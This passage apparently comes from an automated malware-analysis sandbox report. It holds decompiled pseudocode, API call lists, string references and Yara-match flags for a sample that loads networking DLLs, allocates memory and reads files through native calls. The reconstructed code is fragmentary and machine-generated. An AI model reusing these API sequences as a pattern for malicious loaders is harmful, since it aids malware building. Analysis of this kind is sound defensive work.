                                          								goto L19;
                                          							}
                                          						}
                                          						L21:
                                          						if(_v8 > 7 || _t167 >= 0x80) {
                                          							break;
                                          						} else {
                                          							if(E0078685D(_t167, 4) == 0) {
                                          								if(E0078685D(_t167, 0x80) != 0) {
                                          									if(_v12 > 0) {
                                          										break;
                                          									}
                                          									_t127 = 1;
                                          									_a7 = 1;
                                          									_v24 = _t164;
                                          									_v20 = 1;
                                          									_v16 = 1;
                                          									L36:
                                          									if(_v20 == _t127) {
                                          										goto L19;
                                          									}
                                          									_t158 = 0;
                                          									goto L14;
                                          								}
                                          								break;
                                          							}
                                          							_a7 = 0;
                                          							_v24 = _t164;
                                          							_v20 = 1;
                                          							_v16 = 1;
                                          							goto L19;
                                          						}
                                          					}
                                          					_t130 = _t118 - 1;
                                          					if(_t130 != 0) {
                                          						if(_t130 == 1) {
                                          							goto L21;
                                          						}
                                          						_t127 = 1;
                                          						goto L36;
                                          					}
                                          					if(_t167 >= 0x80) {
                                          						L7:
                                          						if(_t167 == 0x3a) {
                                          							_t158 = 0;
                                          							if(_v12 > 0 || _v8 > 6) {
                                          								break;
                                          							} else {
                                          								_t119 =  &(_t164[1]);
                                          								if( *_t119 != _t167) {
                                          									_v8 = _v8 + 1;
                                          									L13:
                                          									_v20 = _t158;
                                          									goto L14;
                                          								}
                                          								if(_v28 != 0) {
                                          									break;
                                          								}
                                          								_v28 = _v8 + 1;
                                          								_t143 = 2;
                                          								_v8 = _v8 + _t143;
                                          								goto L47;
                                          							}
                                          						}
                                          						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                          							break;
                                          						} else {
                                          							_v12 = _v12 + 1;
                                          							_t158 = 0;
                                          							goto L13;
                                          						}
                                          					}
                                          					if(E0078685D(_t167, 4) != 0) {
                                          						_v16 = _v16 + 1;
                                          						goto L19;
                                          					}
                                          					if(E0078685D(_t167, 0x80) != 0) {
                                          						_v16 = _v16 + 1;
                                          						if(_v12 > 0) {
                                          							break;
                                          						}
                                          						_a7 = 1;
                                          						goto L19;
                                          					}
                                          					goto L7;
                                          				}
                                          				 *_a8 = _t164;
                                          				if(_v12 != 0) {
                                          					if(_v12 != 3) {
                                          						goto L29;
                                          					}
                                          					_v8 = _v8 + 1;
                                          				}
                                          				if(_v28 != 0 || _v8 == 7) {
                                          					if(_v20 != 1) {
                                          						if(_v20 != 2) {
                                          							goto L29;
                                          						}
                                          						 *((short*)(_a12 + _t136 * 2)) = 0;
                                          						L65:
                                          						_t105 = _v28;
                                          						if(_t105 != 0) {
                                          							_t98 = (_t105 - _v8) * 2; // 0x11
                                          							E00768980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                          							_t110 = 8;
                                          							E0075DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                          						}
                                          						return 0;
                                          					}
                                          					if(_v12 != 0) {
                                          						if(_v16 > 3) {
                                          							goto L29;
                                          						}
                                          						_t114 = E0078EE02(_v24, 0, 0xa);
                                          						_t170 = _t170 + 0xc;
                                          						if(_t114 > 0xff) {
                                          							goto L29;
                                          						}
                                          						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                          						goto L65;
                                          					}
                                          					if(_v16 > 4) {
                                          						goto L29;
                                          					}
                                          					_t115 = E0078EE02(_v24, 0, 0x10);
                                          					_t170 = _t170 + 0xc;
                                          					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                          					goto L65;
                                          				} else {
                                          					goto L29;
                                          				}
                                          			}


                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: e17d25ff862f6ecf2e481b7dfc8cfda96a82f675a5a084accf6c44a3afb6e2d7
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: 04917E71E4020AEFDF24EF98C8456EEB7B4FF95304F24807AD411E6262E7785A81CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E007CE759(void* __edx, void* __eflags, intOrPtr _a4, signed short* _a8, char _a11, intOrPtr _a12) {
                                          				signed int _v8;
                                          				char _v12;
                                          				char _v16;
                                          				char _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				short _v30;
                                          				signed int _v32;
                                          				char _v40;
                                          				char _v48;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				short* _t47;
                                          				intOrPtr _t50;
                                          				short _t67;
                                          				signed int _t79;
                                          				signed int _t83;
                                          				void* _t86;
                                          				signed short* _t87;
                                          				intOrPtr _t88;
                                          				void* _t89;
                                          
                                          				_t87 = _a8;
                                          				_t79 = 0;
                                          				_v8 = 0;
                                          				_t47 = E00768375(_t87, 0x3d);
                                          				if(_t47 == 0) {
                                          					L23:
                                          					__eflags = 0;
                                          					return 0;
                                          				}
                                          				 *_t47 = 0;
                                          				_t83 =  *_t87 & 0x0000ffff;
                                          				_t92 = _t83 - 0x53;
                                          				if(_t83 != 0x53) {
                                          					__eflags = _t83 - 0x4f;
                                          					if(_t83 != 0x4f) {
                                          						goto L23;
                                          					}
                                          					_t50 = E00805AA6(_t47 + 2,  &_v24, 0x10);
                                          					_t89 = _t89 + 0xc;
                                          					_v8 = _t50;
                                          					__eflags = _t50;
                                          					if(__eflags == 0) {
                                          						goto L23;
                                          					}
                                          					_a11 = 1;
                                          					L6:
                                          					_push(_a4);
                                          					_t86 = E007CE6F3(_t92);
                                          					if(_t86 == _t79) {
                                          						goto L23;
                                          					}
                                          					_t88 = ( *(_t86 + 0x14) & 0x0000ffff) + _t86 + 0x18;
                                          					if(0 >=  *(_t86 + 6)) {
                                          						L22:
                                          						return 1;
                                          					} else {
                                          						goto L8;
                                          					}
                                          					do {
                                          						L8:
                                          						if( *((intOrPtr*)(_t88 + 0xc)) != 0 &&  *((intOrPtr*)(_t88 + 8)) != 0) {
                                          							if(_a11 != 0) {
                                          								_t28 = _t79 + 1; // 0x1
                                          								__eflags = _v8 - _t28;
                                          								if(__eflags != 0) {
                                          									L19:
                                          									if(_a11 != 0) {
                                          										goto L21;
                                          									}
                                          									L20:
                                          									E0075E1C6( &_v40);
                                          									goto L21;
                                          								}
                                          								L18:
                                          								_v12 =  *((intOrPtr*)(_t88 + 8));
                                          								_v16 =  *((intOrPtr*)(_t88 + 0xc)) + _a4;
                                          								_push( &_v20);
                                          								_push(_a12);
                                          								_push( &_v12);
                                          								_push( &_v16);
                                          								E00750048(0xffffffff);
                                          								_push(_v20);
                                          								_push(_v12);
                                          								_push(_v16);
                                          								E007A3F92(0x55, 3, "Set 0x%X protection for %p section for %d bytes, old protection 0x%X\n", _a12);
                                          								_t89 = _t89 + 0x1c;
                                          								if(_a11 != 0) {
                                          									goto L22;
                                          								}
                                          								goto L19;
                                          							}
                                          							_t67 = 8;
                                          							_v30 = _t67;
                                          							_v28 = _t88;
                                          							_v32 = 0;
                                          							while( *((char*)((_v32 & 0x0000ffff) + _t88)) != 0) {
                                          								_v32 = _v32 + 1;
                                          								_t100 = _v32 - 8;
                                          								if(_v32 < 8) {
                                          									continue;
                                          								}
                                          								break;
                                          							}
                                          							_push(1);
                                          							_push( &_v32);
                                          							_push( &_v40);
                                          							if(E0075E755(_t79, _t86, _t88, _t100) < 0) {
                                          								goto L23;
                                          							}
                                          							if(E0076BAA4( &_v48,  &_v40, 1) != 0) {
                                          								goto L20;
                                          							}
                                          							goto L18;
                                          						}
                                          						L21:
                                          						_t79 = _t79 + 1;
                                          						_t88 = _t88 + 0x28;
                                          					} while (_t79 < ( *(_t86 + 6) & 0x0000ffff));
                                          					goto L22;
                                          				}
                                          				E0075E2A8(_t83,  &_v48, _t47 + 2);
                                          				_a11 = 0;
                                          				goto L6;
                                          			}


                                          0x00000000
                                          0x007ce856
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007ce858
                                          0x007ce8b9
                                          0x007ce8bd
                                          0x007ce8be
                                          0x007ce8c1
                                          0x00000000
                                          0x007ce7ef
                                          0x007ce794
                                          0x007ce799
                                          0x00000000

                                          APIs
                                          Strings
                                          • ]z, xrefs: 007CE75B
                                          • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 007CE893
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: _wcstoul
                                          • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]z
                                          • API String ID: 1097018459-692138959
                                          • Opcode ID: 22096101cac878c8b58b99fe7b3c89fe8faaa74275e805e4d9121a8889f12b56
                                          • Instruction ID: 98704757b1bf7d3b1d43f40b79b063f1c91a3ae380a81f271e84c71bdbbe11ba
                                          • Opcode Fuzzy Hash: 22096101cac878c8b58b99fe7b3c89fe8faaa74275e805e4d9121a8889f12b56
                                          • Instruction Fuzzy Hash: 71418972D00259EADF109FE4C885FEEB7F8AF05310F14946EE951A6081E778DA88DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • 1u, xrefs: 0078C56F
                                          • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 0078C5BB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: 1u${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                          • API String ID: 48624451-2845918265
                                          • Opcode ID: 3cdadbe20c223b17f550228a1149506bf47735b8c2aa3b3073b02a6b79f7c637
                                          • Instruction ID: 2e1af252c6bfde74edc154ef78057dbd59e86601467e82ba10d49215bfbca510
                                          • Opcode Fuzzy Hash: 3cdadbe20c223b17f550228a1149506bf47735b8c2aa3b3073b02a6b79f7c637
                                          • Instruction Fuzzy Hash: BF0184A60086B075D72197AB4C11873FBF99FCEA15728C08EF6D88A296E17FC542D770
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E007CE8DB(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                          				char _v8;
                                          				short* _t8;
                                          				void* _t10;
                                          				void* _t18;
                                          				void* _t20;
                                          
                                          				_t18 = __edx;
                                          				_t1 =  &_a8; // 0x7ae35d
                                          				_t8 = E00768375( *_t1, 0x2c);
                                          				if(_t8 != 0) {
                                          					 *_t8 = 0;
                                          					_t10 = E00805AA6(_t8 + 2,  &_v8, 0x10);
                                          					_t20 = _t10;
                                          					_t30 = _t20;
                                          					if(_t20 != 0) {
                                          						_t23 = _a4;
                                          						_push(_t20);
                                          						_t4 = _t23 + 0x24; // 0x24
                                          						E007A3F92(0x55, 3, "CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X\n", _a8);
                                          						_t10 = E007CE759(_t18, _t30,  *((intOrPtr*)(_a4 + 0x18)), _a8, _t20);
                                          					}
                                          					return _t10;
                                          				}
                                          				return _t8;
                                          			}









                                          APIs
                                          • _wcstoul.LIBCMT ref: 007CE901
                                            • Part of subcall function 00805AA6: __cftof.LIBCMT ref: 00805AB6
                                          Strings
                                          • ]z, xrefs: 007CE8E3
                                          • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 007CE91B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: __cftof_wcstoul
                                          • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]z
                                          • API String ID: 1831096779-3069914341
                                          • Opcode ID: 742ad109bcad250e78ca3d0c8ac9931ea8a963fde2bde0135e89c8484c32d008
                                          • Instruction ID: 7271abb3115be30341293e42294f4173e88751ab5a9bc6884e00abcb88f94309
                                          • Opcode Fuzzy Hash: 742ad109bcad250e78ca3d0c8ac9931ea8a963fde2bde0135e89c8484c32d008
                                          • Instruction Fuzzy Hash: C5F0F037140204BAEB202A55EC07F9B77ACDF91B20F04821DFE059A191EAB9EA01CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00084BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00084BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0008A3AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: 33aa133b1828de7a33f34ff2abfb8f4a657c94ad4ae741a971a1f8b17fb592ea
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: e7e3a10ca9ccd7c3be8e36c29fbd26017a075aeffaff3eec138e7c28ce469026
                                          • Instruction ID: a11de42b52788f93da82bead7ef01ab80e4274520370fbf2825824756d9cb6dc
                                          • Opcode Fuzzy Hash: e7e3a10ca9ccd7c3be8e36c29fbd26017a075aeffaff3eec138e7c28ce469026
                                          • Instruction Fuzzy Hash: 73F0ECB2200108BFDB14DF99DC81EEB77A9EF8C354F158648BA5DA7241D630E811CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: 9146610a82c7d28884839af937c71fe69ddc05b2b6cb9a8e0f7e58f84478092f
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: 28F0A4B2200208ABDB14DF89DC81EEB77ADEF8C754F158259BA1D97241D630E8118BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00072D11,00002000,00003000,00000004), ref: 0008A579
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: bc206d9f2071b923372039f064e3137b2ea009f243bd174e6cd940b4fb91c3e0
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: 27F015B2200208ABDB14DF89CC81EEB77ADEF88754F118159BE0897242C630F810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00084D50,?,?,00084D50,00000000,FFFFFFFF), ref: 0008A4B5
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: 8da779fb4580b145d932e8e32d90a0ec373589454ed40f45412f1b399caffab5
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: F0D012752002146BD710EBD8CC45ED7775CEF44750F154455BA585B242C530F50087E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: d292646b53f3673a97033269a2c46c1d1b3239bf0ab44cc631d5baa1962528d6
                                          • Instruction ID: 63eea2a9cce711fd0ba5915966e7b032c3e5f0516d66f5c824bbb576779f074c
                                          • Opcode Fuzzy Hash: d292646b53f3673a97033269a2c46c1d1b3239bf0ab44cc631d5baa1962528d6
                                          • Instruction Fuzzy Hash: 1FA002BE658214797E3472B53C15CFE560CD5C53B52115967F54D808104457D8541271
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 00089128
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00073AF8), ref: 0008A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0007836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0007838B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0007F1D2,0007F1D2,?,00000000,?,?), ref: 0008A800
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0007AD62
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
